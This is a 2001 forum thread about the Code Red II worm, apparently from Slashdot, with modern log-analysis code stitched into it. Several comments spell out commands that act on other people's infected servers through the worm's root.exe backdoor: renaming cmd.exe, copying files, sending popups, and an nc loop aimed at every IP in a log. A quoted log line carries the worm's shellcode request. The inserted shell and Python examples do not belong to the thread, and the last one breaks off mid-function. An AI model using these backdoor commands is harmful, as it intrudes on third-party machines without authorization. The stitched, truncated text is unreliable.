..that code red I wasn't written along the lines of code red II. There would be a lot more unpatched websites out there with super user wide open.. I think this hints that code red I and code red II are written by different people.
Right now my NIC is flickering like mad, yet Windows 2000 does not show these as incoming or outgoing packets. What is going on?
I wanted to know would it be possible to make a similar virus for Linux using a Bash Shell.
If not, why not?
I still think sircam is more annoying since it affects every email user
Every email user?!? CmdrTaco must run Windows. Let's get him!
This script kiddie won't stop until he gets all over the news about the damage it caused.
Another 13 year old looking for attention.
until (succeed) try { again(); }
They got lucky when the hacker messed up (he used a hard IP instead of domain name). What did they do in response?
What did the whitehouse.gov admins do once they realized that they were a clear target? Write angry but useless letters to microsoft? Call Bill Gates and piss and moan?
NO! they took a PRO-ACTIVE reaction to a threat of clear and imminent danger to information distribution and installed Linux.
www.whitehouse.gov is there a lesson there?
First came NNNNNNN then XXXXX... Hmmmmm. I predict two more versions : IIIIIII and UUUUUUU.. It's a word scramble game!
Is there a Windows command line equivalent to "shutdown -h now", by any chance? I know I really shouldn't do it, but I'd be so sorely tempted to write a script that would shut down any infected box that scanned mine.
The more I think about it, the more it seems like a permissible act of self defense. It does no harm to the infected box (if the worm doesn't write itself to disk, as I've read, it actually helps) and prevents the infected box from being used to perpetuate more abuse.
Hmm . . .
Because those who are most vulnerable to the worm/virus are the companies with the most clueless sysadmins, the set of machines with uninstalled service packs (and running Index Server by out-of-the-box default, the vulnerable component) probably largely overlaps the set of Code Red machines.
Yes, having to administer one of these along with Solaris and Linux boxen, I've patched mine; trivial).
I tried pulling up a few IP's logged in my apache logs and this is what I got for most of them:
The page cannot be displayed
There are too many people accessing the Web site at this time.
HTTP 403.9 - Access Forbidden: Too many users are connected
Internet Information Services
Technical Information (for support personnel)
Background: This error can occur if the Web server is busy and cannot process your request due to heavy traffic.
90% of them are unsecured computers on the @home 24.x.x.x network.
It's not as if many /.ers need to be told about the existence of the DEL command, and the intellectual leap required to recognize that the ability to execute an arbitrary command implies the ability to execute a particular command seems rather modest to me.
But before we mod this down as an insult to the intelligence of the /. readership, there is a more interesting issue: This particular inspiration is going to occur to a fair number of vandals, kiddies, and assorted undersocialized individuals. Many of them will do something more destructive with it than posting it to slashdot. More generally, the level of sophistication needed to attack a CRII-compromised machine is low, much lower than even script-kiddie level, low enough that any moderately determined wolfcub with a bent hairpin and a telnet client can do tremendous damage.
Thus, CRII has suddenly created and widely advertised a pool of very vulnerable machines. It would not be surprising to find that the worst damage is done by vandals following along behind CRII, just as looters follow behind natural disasters.
If you take the water away completely and hold the frog over the heat source itself it will roast.
Sorry, I'm "in a mood" today and I couldn't help myself.
Still, it's interesting. If you put the frog in cold water and slowly turn up the heat what it will do, being cold blooded, is go to sleep long before it dies and *poaches.*
What is the relevance and why should anyone care? Lobster.
The correct way to cook a lobster, no matter what *anyone* tells you, is to put it in cold water and bring the heat up. The lobster relaxes and goes to sleep before it cooks.
If you just dump it in hot water it goes " Eeeeeeeeeeee," tightens up all of its muscles and pumps lactic acid throughout its system before it dies.
Starting in cold water is both more humane and results in quite noticeably tastier lobster.
KFG
http://infected_machine/scripts/root.exe?/c+ren+cmd.exe+worm.exe
I've been told trying to delete cmd.exe gives access denied - maybe its attrib +r+s or something. This one works for sure
My server
Someone on the 24.x.x.x domain (@home) is infected bad with this thing. I'm not even running a server. I'm just surfing today, Zone alarm is going crazy reporting attacks to different ports. What gives? I thought this was a port 80 thing?
This is a Sig, there are many like it but this one is mine! I wish I had more than 120 chars... whats a char?
According to some of the posts I've been seeing a lot of the infected machines are on cable-modem users. Due to the nature of this new beast we have access to all these infected servers. Cable-modem users due to their high bandwidth tend to have some of the best downloadz. It sounds to me like this is just Napster Version 2.
Dozings.com -- Its kinda funny... If you're as crazy as me.
OR, one group could patch all those infected hosts...or at least notify the admins.
I've got a full analysis of this at http://braddock.com/cr2.html
This happened to me on 7/23/01, so I don't know how new it really is. Now time to format that damn win2k box :-(
rooooar
...to shut down these systems now?
Think about, folks - I'm no script kiddie, but using information posted on /. under this article, I grabbed the URL of an infected system and using my Internet Explorer (on Win95 no less) was able to do a DIR C:\ on aforementioned system (following the instructions in a posting here on /.).
Surely that means that Slashdot is contributing to the problem by making all the necessary information available where any script kiddie can find it.
Now that we've made that information available, surely we have a responsibility to at the least remotely shut down the systems so that they aren't at further risk until the owners see them tomorrow morning?
Now of course, that may be still considered 'hacking' so is there a suitable government or non-government organization which could legally do this?
...timothy and cmdr Taco both showed up to work today wearing matching golf shirts and Dockers pants. Upon further inspection, it was determined that they also had the exact same type of socks, shoes, and belts (they stopped short of comparing underoos). At some point, Hemos was quoted as saying, "You know, I think you two should talk to each other before coming in to work."
--------
Bleah! Heh heh heh... BLEAH BLEAH!!! Ha ha ha ha...
What really needs to be done is setup a software protective services agency, similar to child protective services. If the parent (company) is caught abusing (repeated instances of lack of security, total lack of concern for the end users of the software, etc) the child, the child (software with source code) is taken from them and placed with foster parents (another company) that have the child's (software's) best interests in mind.
I see the first children being Outlook and IIS.
Extra credit: Disinfect the machine with the security patch from the MS Web Site.
As this would be completely passive (Rather than patching the code red code) it should be slightly less dangerous than releasing a new worm to the net. And since it would affect only machines that have already been compromised, it should be slightly less ethically questionable than patching the worm code to do something new and the releasing it. I'm sure I'll get flamed for suggesting it nonetheless...
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
Start using the root.exe to leave files on their hard drives. I left one one some poor admin's desktop, "youwerehitbyCodeRedII,pleasereformatandpatchyouserver"
Ah... I was too lazy to add spaces. Hopefully it would be enough to scare them -- the unfortunate souls don't know their servers are broadcasting that they have a backdoor...
I was curious just how often RedCode attacks. Sure, looking through the apache log files is nice, but it just didn't give me the sense of urgency... the quick succession at which attacks take place. So, I whipped up a quick perl script to play a noise every time I was "attacked". Needless to say, it's getting kind of annoying, but it still is incredible:
#!/usr/bin/perl
# Poll the access log once a second; when the count of Code Red II probes
# (requests carrying the long run of X's) changes, play a buzzer.
while(1) {
  system("cat /var/log/your-access.log | grep XXXXXXXXXXXXX | cut -d \" \" -f 1 | wc -l > attacks_b");
  # diff exits non-zero when the count changed (or attacks_a does not exist yet)
  $returnval = system("diff attacks_a attacks_b > /dev/null");
  if(0!=$returnval) {
    system("cp -f attacks_b attacks_a");
    system("play buzzer2.aiff &");
  }
  sleep(1);
}
char sig[120] = "\0"
I've read most of the discussion on this over today and my net connection is pretty much fux0red thanks to folks on my ISP who don't patch their s/w. I agree writing a virus to propagate and patch the holes in IIS servers is a great idea, but there's always the chance you'll get a slap on the wrists for that - and is anyone willing to risk it?
What I've done instead is set up a mime type for ida files to be handled as PHP, written a pretty simple default.ida that basically refreshes to http://$REMOTE_ADDR?/c+iexplore+http://www.jado.org/codered.html
http://www.jado.org/codered.html being a little file that says "Hi, you've got Code Red dumbass, fix your PC cos it attacked mine :)" and includes a link to Symantec's site on Code Red C (complete with patch) - oh, and a link to mine because it gets 0 hits and I figure if this works it's a good way to get traffic :)
Whether or not Code Red is stupid enough to attack the box, wait for a response, then let itself get redirected to another site is another matter - so will it work? I dunno :) I guess I'll find out next time one of the buggers attacks my machine.
I'm guessing what I've done (assuming it even has an effect) is legal? At worst grey-area stuff (since my machine is just responding to a request from theirs). :)
Oh, and it's late and I'm tired - English is my first language but I'm almost asleep writing this, sorry if it's a bit discombobulated
--
Jado.
The loneliest site on the net
From the article:
The FBI has dismissed using any hack-back tactic as well. "It is not something that we could consider," said spokeswoman Debbie Weierman. "It would basically be viewed as an unauthorized intrusion."
It's not clear from the article whether such an 'unauthorized intrusion' by a private citizen would be illegal, but it might be worth thinking about before you go riding out to do battle with the Red Worm.
Let me make sure I understand this one.
I grep \?XXX from /var/log/apache/access.log
grep \?XXX /var/log/apache/access.log | mawk '{print($1) }'
Then, for each result, I can telnet to port 80 and remote root the machine with a single get request for scripts/cmd.exe ??
I have 45 such hits in my log files, mostly from machines at my ISP. That is truly ridiculous.
It was just a tiny mention, and it was in a little hickville newspaper, but SirCam finally got some print attention. Of course, it was in a Code Red article, which was careful to let the sticks dwellers know that as long as they didn't use NT or 2000 (why would they?) they were safe. I myself received SirCam, but since my e-mail client doesn't use scripts, I was safe. Now, if the mainstream net media could only see that we, the wee users, are in more trouble than the big bad companies...
Blog Prophyts - Right On, Man
Here's where I got:
Suggestions? (Non-destructive, please, the goal is to alert not hurt)-- @rjamestaylor on Ello
With all those destructive virus-writers groups and everything, you'd think by now there'd be an Illuminati-type secret organization of white hat programmers somewhere out there that cripple viruses and release a "serum" strain to innoculate systems and close MS's holes.
It would be illegal of course, but, well, Robin Hood broke the law too.
(I'm not advocating this of course, just thinking it's curious no such organization exists)
W
-------------------
This is my SIG. There are many like it, but this one is mine.
The Code Red 2 worm has gotten into the MS corporate network and is running loose behind their firewall. Their internal IIS servers are attacking each other.
Slow them down!!!!!!
i am so very tired....
It's even better for me, my own ISP (noos.net) has machines that are currently attacking me... see the log below :
212.198.0.93 - - [05/Aug/2001:08:59:41 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.1" 404 283 "-" "-"
guess what... this is "curie.noos.net", part of my ISP's systems
Sorry that link should have been to the FAQ referenced in the article. The FAQ's old (July 31), but the basics still apply.
http://IP.IP.IP.IP/scripts/root.exe?+/c+start+%20http://www.digitalisland.com/codered/
Find & run websnarf.pl or grab the IP's off your web logs, run this on the IP of whoever attacks with v2 (XXXXXXXXXXXXXXXXXX) and you're set. It's easier, I think, since it gives them more info (starts their browser & points them to info on CR, though I wish it had more info on how to remove the *trojan* which will not disappear with the patch :/ since it also creates the /c and /d aliases to *keep* them infected...)
I do wish we could autopatch these, but this is the next best thing, since it's not harmful (unlike the format c: ideas some are having... *sigh* ...)
If someone comes up with an autopatch script which grabs the logs from websnarf, then telnets in & fixes them up, I'm open to ideas here...
I've been recording the hits of V1 and V2 from my machine since early this afternoon, thanks to a very handy Perl script provided by another Slashdot user.
You can find the results and a link to the script here
this sucks... I wanted to tie the servers up, but actually, now that I think of it, this will flood the network more...oops....
i am so very tired....
Though I feel like one about now... long night. :)
Those are going to a shared e-mail alias. I get copies of everything, as well as a few other people. Unfortunately, because they are coming in many format types, we have to compile them by hand. But absolutely, please do send us the logs and have them in the format requested.
Shesh, I keep waiting for cnn, abc, cbs, bbc, SOMEONE to report that the internet's security has just been turned to swiss cheese, but all of them are still headlining stories that their technology editor wrote before going home for the weekend about how "The Red Tide recedes", and "Code Red virus not so bad...kinda soft and cuddly".
Visions of thousands of password packet sniffers kicking in Monday morning on CR2 backdoored systems dance in my head....
So I figured this out....maybe they will see it? echo GET /scripts/root.exe?/c+copy+c:\winnt\clock.avi+c:\youhavecodered.txt | telnet %1 80
Seems like a good idea. So anyone help me get the IP's out of my access_log so I can feed 'em to the script. I am not to good with sed so..
Some command to grep the access_log for the .ida and then get the IP and put it in a test file?
grep -E \.ida /var/www/log/access_log
Then???
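One defender-side answer to the log-mining question here, and to the counting the Perl buzzer script above does by hand: pull the probing IPs out of an Apache access log, tell Code Red v1 (N filler) from Code Red II (X filler), and emit the "IP date time" lines the aris-report robot upthread asks for. This is an added example, not code from any poster; the log lines are constructed and the default Apache common/combined log layout is assumed.

```shell
#!/bin/sh
# Added example: mine an Apache access log for Code Red probes and produce
# a per-source summary plus report lines, without touching the probing hosts.
# Assumes the default Apache common/combined format: field 1 is the client
# IP, field 4 the bracketed timestamp, field 7 the request path.

# Constructed sample standing in for /var/www/log/access_log. The filler
# runs are shortened; real probes carry a much longer run of N's or X's.
SAMPLE_LOG=$(cat <<'EOF'
24.1.2.3 - - [05/Aug/2001:08:59:41 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801 HTTP/1.0" 404 283 "-" "-"
212.198.0.93 - - [05/Aug/2001:09:00:12 +0200] "GET /default.ida?NNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801 HTTP/1.0" 404 283 "-" "-"
24.1.2.3 - - [05/Aug/2001:09:01:07 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801 HTTP/1.0" 404 283 "-" "-"
10.9.8.7 - - [05/Aug/2001:09:02:00 +0200] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/4.0"
24.1.2.3 - - [05/Aug/2001:09:03:30 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801 HTTP/1.0" 404 283 "-" "-"
EOF
)

# codered_sources: read log text on stdin, print "count ip variant" for
# every source that sent a default.ida probe, busiest source first.
# The filler byte after "default.ida?" distinguishes the two generations:
# N = original Code Red, X = Code Red II.
codered_sources() {
    awk '
        $7 ~ /^\/default\.ida[?]/ {
            variant = "unknown"
            if ($7 ~ /^\/default\.ida[?]N+/) variant = "CodeRed-v1"
            else if ($7 ~ /^\/default\.ida[?]X+/) variant = "CodeRed-II"
            hits[$1 " " variant]++
        }
        END { for (k in hits) print hits[k], k }
    ' | sort -rn
}

# codered_report_lines: one "ip date time" line per probe, the shape the
# aris-report@securityfocus.com robot wants. The timestamp field arrives as
# "[05/Aug/2001:08:59:41"; strip the bracket and split on ":".
codered_report_lines() {
    awk '
        $7 ~ /^\/default\.ida[?]/ {
            ts = $4; sub(/^\[/, "", ts)
            split(ts, p, ":")
            print $1, p[1], p[2] ":" p[3] ":" p[4]
        }
    '
}

# Stand-alone run against the constructed sample. Replace with e.g.
#   codered_sources < /var/www/log/access_log
# on a live box.
printf '%s\n' "$SAMPLE_LOG" | codered_sources
printf '%s\n' "$SAMPLE_LOG" | codered_report_lines
```

Feeding the report lines to the address upthread is left to the reader; nothing here sends anything to the probing hosts.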
how come the FBI or another government agency hasn't bothered to get about the buznuzz of tracking down who wrote this? (if that's even possible?)
Yea, so, I noticed on my 20 IP multi-homed linux server I was getting a lot of hits, so here's my answer. Notice the confirmation log.
Now what's the W2K command to change the IP to 10.1.2.3?
I am currently logging the attacks on my btopenworld ADSL box by using a dummy default.ida script.
The results are on display here (until my dyndns changes).
Viral code sent is stored in my database and different code variants are logged. I only started logging today.
It is obvious from the stats that V2 is enjoying bt openworld's subnet very much, since all my attacks so far have come from within there.
Weevil
ghaa.
Holy crap. http://www.msnbc.com/news/606910.asp
Always do right. This will gratify some people and astonish the rest. -- Mark Twain
If Code Red III was released now after all these root shells have been exposed, what is the worst thing that it could do on a large scale?
how does sircam affect every email user? shouldn't you say it affects every outlook user who has scripting enabled and is ignorant enough to open attachments they are not expecting?
personally i think a root exploit that is broadcast to everyone on your subnet is worse. especially if your subnet is on @home.
-- john
cat access_log | grep default.ida | cut -d ' ' -f 1 | awk '{printf("echo \"GET /scripts/root.exe?/c+mkdir+c:\IMA_FUCKING_MORON\" | nc %s 80\n", $1);}' > IMA_FUCKING_MORON.sh
So after the code-red and the other one a while back came out, I found out about it as soon as the first attack hit my system (via email) and then checked my logs and was pleased to see many attempts, but no change at all. I'm not trying to be arrogant here, I just wanted to point out that it is possible to secure your IIS (or any system for that matter) so that stupid bugs won't compromise your system.
If God gave us curiosity
As a certain commercial operating system gets more and more bloated, larger and larger files are less noticed. How long before a 1-2MB virus with a couple dozen attack types built in starts making the rounds?
I know, I know - but seriously: I had to patch this on our Win2k machine back in March/April - I'm presuming that this is the Solaris/Windows thing (site must have been slashdotted) or a variant of (forgive my ignorance if I'm wrong). Either way it overwrote the default pages and gave the user some system access - using echo commands to write to files etc... now where was that freakin' link to prove it...
Either way this was what the server logs looked like..
/msadc/../../../../../../winnt/system32/cmd.exe /c+dir+..\ 200 0 871 99 70 HTTP/1.0 - - - -
/msadc/../../../../../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 0 401 129 90 HTTP/1.0 - - - -
somebody tell me if this is a different bug (but even so the exploit looks similar...)
It could be known as the "Your Welcome" virus.
Unfortunately, I don't know diddly-shit about it.
It seems Code Red not only duplicates itself, but duplicates articles that talk about it!!
http://news.cnet.com/news/0-1003-200-6786199.html?tag=mn_hd
http://www.cnn.com/2001/TECH/internet/08/05/code.red.ap/index.html
http://www.wired.com/news/technology/0,1282,45845,00.html
and of course...
http://slashdot.org/article.pl?sid=01/08/05/1620220&mode=thread
http://slashdot.org/article.pl?sid=01/08/05/0433219&mode=thread
[alk]
....proudly sports the "Powered by Win2000 Server logo".
I fucking know that you are running Win2k server, that's why you're infected with code red and attacking my poor linux box ;)
"Mary had a crypto key, she kept it in escrow, and everything that Mary said, the Feds were sure to know."
If someone wrote a worm that maintained encrypted peer-to-peer connections between machines or arbitrary ports and a host routing table (gnutella style), this worm would suddenly shift shape into something potentially a lot worse.
If this was then coupled with a self-propagating plug-in system requiring public-key encryption to install plug-in modules, the worm's creator could effectively initiate and propagate counter attacks and defensive measures.
I find this an intriguing but incredibly scary concept.
MSNBC has a longer story.
Fox News has a few words to say.
ABC copied the AP story.
CBS still seems to think the red tide is receding.
Meanwhile the worm has knocked on my computer's door six times since I started this post. Uh, make that seven.
I admin a class B network and the firewall was taking hits at about 3500 per minute on July 19th. On August 1 the firewall started taking CodeRed hits at around 1200 per minute. Filled up logfiles are no fun, so we stopped logging CodeRed probes a couple of days later. I set up an OpenBSD box with websnarf from http://www.unixwiz.net and several IP numbers, and I am getting about as many Code Red II as Code Red original hits on it. The only thing that will work to cure this is to either attack back and patch, or reboot the machine to slow down the infection. Looking up many of the addresses, you find that it is not the .com guys, it is the Asian and Cable/DSL networks. Where did all those Windows 2000 machines come from?
Say goodbye to the Internet, Cringely is right, we need a dog.
While I realize that the press release is unlikely to cover his side of things, this doesn't sound like an equivalent situation. If you have more info, pass it along... I'm not familiar with the case and may be totally off-base. The primary difference seems to be that the other machines weren't attacking his.
The idea of having machines do directed retaliation against attacks is something the government itself uses, as I believe do some companies. While I will grant that changing things on someone else's computer is on questionable ground, I also think that given the circumstances (a machine is attacking yours with a virus) you are probably on safe ground to respond. I think it would only be legal if it was in non-self-propagating form - that is, only used as an automatic response to an attack.
That said, it would be a lot safer if you could filter out governmental IPs... those are the only ones that would be likely to cause any major fuss.
~ Leilah
This is exactly why an infected server should be rebuilt and properly secured...
LedgerSMB: Open source Accounting/ERP
jill.c. Don't regard it as a malicious exploit, it's in fact a very powerful remote administration tool. All our NT boxes are not attached to the Internet so we don't worry. :)
You'll get beyond c:\ by enclosing your path in quotes eg "c:\Program Files"
Why don't you add a check to stay away from Apache servers?! The worm would be more difficult to trace without all that access.log evidence....
/usr/log/apache man.
You are overloading my
If they illegally accessed your machine first, that does not excuse them from liability. If i break in to george's house and steal his gun, then use it to kill gene, george may have liability if he did not report the gun stolen.
i am so very tired....
I'm on a 65.x.x.x att broadband connection. Not sure about you, but my IP is static. Just force your IP address, don't rely on their DHCP server. Your IP address and related information should be on the paperwork the att guy left with you. I'm getting around 150 hits an hour for it. It almost seems to have slowed since this afternoon.
To automatically notify webmasters of infected sites, if you have mod_perl/Apache, use this script:
http://forum.swarthmore.edu/epigone/modperl/nehza
It identifies any attempt to access '/default.ida', looks up the MX records of the remote IP, and sends a notification to postmaster@. It is not a 'hack back', just a notification email.
It makes me sad that on a linux system, code red would have been a bug, but on a windows system, its poor administration... To bad the Linux community isn't into dirty behind the back tricks like the evil empire.
As I look at my access logs, it appears that a lot of the code-red2 requests are originating from Asia.
Given what I've read about windows pirating in Asia, this makes me wonder.. How many of the currently compromised systems are running bootleg copies of IIS/Windows and can't easily get the fixed version because they don't actually have a license?
Hopefully we won't have to put up with this virus for longer than we should simply because the security updates aren't 'free'.
Or is the update free to anyone, no questions asked?
Just in the last 12 hours, one person has sent me over 400 copies of this lovely virus. Anyone else just getting attacked?
From: Alliance for the Defense [Claimed cooperative of five polyspecific empires in the Pacific below New Zealand. No record of existence before the Sircam Fall.]
Subject: Code Red
Distribution: Threat of the Blight
So far we've processed half a million messages about this creature, and read a goodly fraction of them. Most of you are missing the point. The principle of the "Code Red's" operation is clear. This is an autonomous worm using electronic communication to operate through an operating system on the Net. It would be fairly easy to do in theory -- we all know the stories of the Morris Worm. But for such communication to be effective within the real world, truly extensive design changes to the base OS must be made. It could not have happened naturally, and it cannot quickly be done to secure operating systems -- no matter what Code Red implies.
We've watched the Microsoft interest group since the first appearance of this Code Red blight. Where is this "Redmond" that they claim to hail from? "In Washington State" they say, and deep in the North. Even their proximate origin, www.microsoft.com, is conveniently slow. We see an alternate theory: Sometime, maybe further back than the last consistent archives, there was a battle between Software Powers. The blueprint for this "Windows" was written, complete with hidden communications interfaces. Long after the original contestants and their stories had vanished, this OS happened to get into a position of prosperity on the Net. And that prosperity was tailor-made, too, re-establishing the Blight which had set the trap to begin with.
We're not sure of the details, but a scenario such as this is inevitable. What we must do is also clear. Redmond, Washington is at the heart of the Blight, obviously beyond all attack. But there are other Windows 2000 systems. We ask the Net to help in identifying all of them. We ourselves are not a large department, but we would be happy to coordinate the information gathering, and the military action against the infected systems that is required to prevent the Blight's spread in the Middle Net.
For nearly seventeen weeks, we've been calling for action. Had you listened in the beginning, a concerted strike might have been sufficient to destroy the Code Red Blight. Isn't the Fall enough to wake you up? Friends, if we act together we still have a chance.
Death to vermin.
so they can keep a count of the infections and see how the worm is propagating through the networks. I myself have been hit 154 times today, but that's a low number because my ISP made our cable modems go dynamic addressing recently. A link to the source code can be found on the page and here. Check frequently, as he updated the code a couple of revisions just today.
"Beware of he who would deny you access to information, for in his heart, he dreams himself your master."
A user on grc.security (news.grc.com) suggested using the Windows "net send" command to send a pop-up message to the infected user. net.exe won't talk across the Internet, but you ought to be able to run the net.exe program on the rooted IIS box, something like:
http://ipaddress/c/inetpub/scripts/root.exe?/c+net+send+%25COMPUTERNAME%25+You+have+been+infected+by+the+Code+Red+II+Worm+which+attempted+to+attack+my+server
%25COMPUTERNAME%25 translates to %COMPUTERNAME%, which returns the Windows hostname. I know that works from one of my failed attempts that gave me a reply, but with the above string, I get back a page with "Error in CGI Application" as the title:
CGI Error
The specified CGI application misbehaved by not returning a complete set
of HTTP headers. The headers it did return are:
and it doesn't give me any return. Can anyone verify and/or debug this? It *might* be working.
The %USERDOMAIN% variable might be useful too, so you could send to the whole Windows domain, "Machine LUSER on DOOFUSDOMAIN is infected with Code Red II" or some such. %USERDOMAIN% is the machine name on systems on a workgroup.
.. how MS software sucks.
The worm should get 400 "Bad Request" on any HTTP server. That's not 404 "File not found." The worm has two spaces between the URL and the HTTP version. The spec says one and only one. So Apache, Zope, and any other sane HTTP server will throw out the request. Sure, it's a quick fix for both MS and the worm writer on this point, but still. RTFRFC!
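The grammar point in this post (one SP between method, URI and version, per RFC 2616 section 5.1) is easy to check mechanically. The following is an added Python example, not code from the thread or from any of the servers named in it; it applies the strict reading of the request-line grammar to a few constructed request lines and returns 400 for the double-space form, 404 for the same probe with correct spacing, and 200 only for paths in a small constructed route table. It does not claim to reproduce what Apache or Zope actually do with such a line.

```python
import re
from typing import List, Tuple

# RFC 2616 section 5.1: Request-Line = Method SP Request-URI SP HTTP-Version CRLF.
# Exactly one SP between the tokens; a second space makes the line malformed.
_METHOD = re.compile(r"^[A-Z]+$")
_VERSION = re.compile(r"^HTTP/\d+\.\d+$")
_URI = re.compile(r"^[^\x00-\x20\x7f]+$")  # no whitespace or control bytes

# Constructed route table for this toy server; only these paths exist.
ROUTES = {"/", "/index.html"}


def parse_request_line(line: str) -> Tuple[int, str]:
    """Classify one Request-Line the way a strict server would.

    Returns (status, reason): 400 for anything that breaks the grammar
    (extra spaces, tabs, bad version token, missing parts), 404 when the
    path is syntactically fine but not served, 200 otherwise.
    """
    line = line.rstrip("\r\n")
    parts = line.split(" ")          # split on SP only: "  " yields an empty token
    if len(parts) != 3 or "" in parts:
        return 400, "Bad Request"
    method, uri, version = parts
    if not (_METHOD.match(method) and _URI.match(uri) and _VERSION.match(version)):
        return 400, "Bad Request"
    path = uri.split("?", 1)[0]      # ignore the query string when routing
    if path not in ROUTES:
        return 404, "Not Found"
    return 200, "OK"


def classify(lines: List[str]) -> List[int]:
    """Status codes for a batch of request lines, in order."""
    return [parse_request_line(line)[0] for line in lines]


# Constructed request lines (not captured traffic): the first mimics the
# double space the post describes, the second the same probe with one space,
# the rest exercise other grammar violations.
SAMPLE_REQUESTS = [
    "GET /default.ida?" + "X" * 16 + "  HTTP/1.0\r\n",
    "GET /default.ida?" + "X" * 16 + " HTTP/1.0\r\n",
    "GET /index.html HTTP/1.0\r\n",
    "GET\t/index.html HTTP/1.0\r\n",
    "GET /index.html HTTP/1.x\r\n",
]

if __name__ == "__main__":
    for req, status in zip(SAMPLE_REQUESTS, classify(SAMPLE_REQUESTS)):
        print(status, repr(req.rstrip("\r\n")))
```

Splitting on the single SP character rather than on "any whitespace" is the whole trick: a lenient tokenizer silently collapses the two spaces and then serves or 404s the request, while the strict one never gets as far as routing.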
Just in a period of 5.5hrs I've logged 209 hits for the new 3rd generation strain, and only 5 hits for the 1st and 2nd strains of Code-Red.
Let's not lose sight of the sea change in attacks against MS systems. No longer is it a human taking a bot's scan output and taking advantage of a vulnerability at a keyboard. Now it's a human updating a script that 1) scans IPs using 300 threads 2) compromises systems by placing command line access on the vulnerable systems 3) places a trojan on the system, and 4) broadcasts the IP of the vulnerable machine. Most important, the updating of the script for the new MS vulnerability of the month is done BEFORE most admins can put the patches into production. Also, for you IDS folks that look for cmd.exe in the string, who's to say the payload won't change next time? The problem here isn't the indexing server vulnerability. It's the attackers marrying hacking with virus writing, so they can come at vulnerable systems before sysadmins have a chance to patch them. Hope you all keep your IDS updated.
Creating an Apache script that patches any infected hosts would be pretty cool, but I'll be impressed when someone writes a script that installs Linux/Apache on infected hosts.
--
"Karma can only be portioned out by the cosmos." - Homer Simpson [1F10]
With 18 hours of logs the following hit counts and hosts are my top offenders:
2566 63.107.89.163
2234 63.107.219.50
1511 63.107.10.4
171 63.219.102.73
120 63.242.234.252
104 63.65.128.25
90 63.210.101.172
69 210.243.141.61
60 63.198.70.196
56 63.221.173.130
This is out of a total of 3643 unique hosts, 26356 requests. I feel like calling and leaving some 'HEY ASSHOLE!' messages to the net admins.
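The mod_perl notification script mentioned earlier in the thread and the top-offender count above both start from the same step: pull the worm requests out of the access log and group them by source address. Here is an added Python example that does both; it is not the thread's script and not code from any project named here. It parses Apache common-format lines, flags requests carrying the markers the thread itself names (/default.ida, root.exe, cmd.exe), ranks sources by hit count, and drafts a postmaster@ notice per source. The log lines, the RFC 5737 addresses in them, the sender address and the `resolve_domain` table standing in for reverse DNS and MX lookups are all constructed for the example.

```python
import re
from collections import Counter
from typing import Callable, Dict, List, Optional, Tuple

# Apache common log format: host ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-)'
)

# Request substrings the thread treats as worm traffic: the .ida probe and
# the shell copies the second variant leaves in the scripts directory.
PROBE_MARKERS = ("/default.ida", "root.exe", "cmd.exe")

# Constructed sample log (RFC 5737 documentation addresses, not real hosts).
SAMPLE_LOG = """\
198.51.100.10 - - [05/Aug/2001:13:02:11 -0700] "GET /default.ida?XXXXXXXX HTTP/1.0" 400 301
198.51.100.10 - - [05/Aug/2001:13:02:14 -0700] "GET /default.ida?XXXXXXXX HTTP/1.0" 400 301
203.0.113.44 - - [05/Aug/2001:13:03:40 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
203.0.113.44 - - [05/Aug/2001:13:03:41 -0700] "GET /scripts/cmd.exe?/c+dir HTTP/1.0" 404 210
198.51.100.23 - - [05/Aug/2001:13:05:02 -0700] "GET /default.ida?XXXXXXXX HTTP/1.0" 400 301
192.0.2.7 - - [05/Aug/2001:13:06:19 -0700] "GET /index.html HTTP/1.0" 200 1043
this line is deliberately malformed and must be skipped
"""


def parse_log(text: str) -> List[Dict[str, str]]:
    """Parse common-format lines; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            entries.append(m.groupdict())
    return entries


def is_probe(request: str) -> bool:
    """True when the request line carries any of the worm markers."""
    req = request.lower()
    return any(marker in req for marker in PROBE_MARKERS)


def triage(text: str, top_n: Optional[int] = 10) -> Dict[str, object]:
    """Per-host counts of worm requests, the kind of top-offender list posted
    above: total probes, unique probing hosts, and the top_n (count, host)
    pairs highest first (ties broken by address string). top_n=None keeps all."""
    counts: Counter = Counter()
    for entry in parse_log(text):
        if is_probe(entry["request"]):
            counts[entry["host"]] += 1
    ranked = sorted(((n, h) for h, n in counts.items()), key=lambda t: (-t[0], t[1]))
    return {"total": sum(counts.values()), "unique_hosts": len(counts), "top": ranked[:top_n]}


def notifications(text: str, resolve_domain: Callable[[str], Optional[str]],
                  sender: str = "webmaster@example.net") -> List[Tuple[str, str]]:
    """Draft one postmaster@ notice per probing host. resolve_domain maps an
    address to the domain whose postmaster should hear about it; a real script
    would do the reverse DNS and MX lookups here, this one takes an injected
    resolver so it runs offline. Unresolvable hosts get no message."""
    messages = []
    for count, host in triage(text, top_n=None)["top"]:
        domain = resolve_domain(host)
        if not domain:
            continue
        recipient = f"postmaster@{domain}"
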